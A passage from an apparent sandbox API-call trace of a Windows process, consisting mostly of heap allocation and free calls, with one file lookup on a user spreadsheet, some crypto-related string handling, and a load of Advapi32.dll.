Flags=0x0, Size=0x20) returned 0x43cf9a0 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0081.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0081.932] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0081.933] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0081.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0081.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0081.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0081.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0081.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0081.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0081.933] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0081.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0081.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0081.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0081.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0081.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0081.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0081.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0081.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0081.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0081.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0081.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0081.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0081.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0081.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0081.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0081.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0081.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0081.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0081.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0081.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0081.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0081.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0081.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0081.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0081.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0081.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0081.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0081.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0081.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0081.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0081.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0081.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0081.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0081.935] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\lWEK-JelBvY6EHJ.xlsx", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf795b670, ftCreationTime.dwHighDateTime=0x1d5ecb4, ftLastAccessTime.dwLowDateTime=0xe75f1d20, ftLastAccessTime.dwHighDateTime=0x1d5f05e, ftLastWriteTime.dwLowDateTime=0xe75f1d20, ftLastWriteTime.dwHighDateTime=0x1d5f05e, nFileSizeHigh=0x0, nFileSizeLow=0x6285, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="lWEK-JelBvY6EHJ.xlsx", cAlternateFileName="LWEK-J~1.XLS")) returned 0x41ac600 [0081.935] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0081.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0081.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0081.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0081.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0081.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0081.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0081.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0081.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0081.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0081.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0081.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0081.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0081.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0081.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0081.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0081.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0081.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0081.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0081.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0081.936] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0081.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0081.936] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0081.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0081.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb0a8 [0081.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0081.936] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0081.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0081.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0081.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0081.936] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0081.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0081.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0081.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb108 [0081.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0081.936] PeekMessageW (in: lpMsg=0x144e55c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e55c) returned 0 [0081.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0081.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0081.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0081.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0081.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0081.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0081.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0081.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0081.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0081.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0081.937] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0081.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0081.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0081.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0081.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0081.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0081.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0081.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0081.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0081.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0081.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0081.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0081.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0081.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0081.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.937] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0081.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0081.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0081.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0081.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0081.938] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0081.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0081.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0081.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0081.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0081.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0081.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0081.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0081.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0081.938] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0081.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0081.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0081.938] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0081.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0081.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0081.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0081.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2aa0 [0081.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0081.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0081.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0081.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0081.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb318 [0081.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0081.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb330 [0081.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0081.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0081.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0081.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0081.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0081.939] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0081.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0081.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0081.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0081.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0081.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0081.939] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0081.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0081.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0081.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0081.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0081.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0081.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0081.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0081.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0081.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0081.939] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0081.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0081.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0081.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0081.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0081.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0081.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0081.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0081.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0081.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0081.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.940] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0081.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0081.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0081.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0081.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0081.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0081.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0081.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0081.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0081.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0081.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0081.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0081.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0081.940] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0081.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0081.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb2d0 [0081.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0081.940] PeekMessageW (in: lpMsg=0x144e32c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e32c) returned 0 [0081.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0081.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0081.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0081.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0081.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0081.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0081.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0081.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0081.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0081.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0081.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0081.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0081.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0081.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0081.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 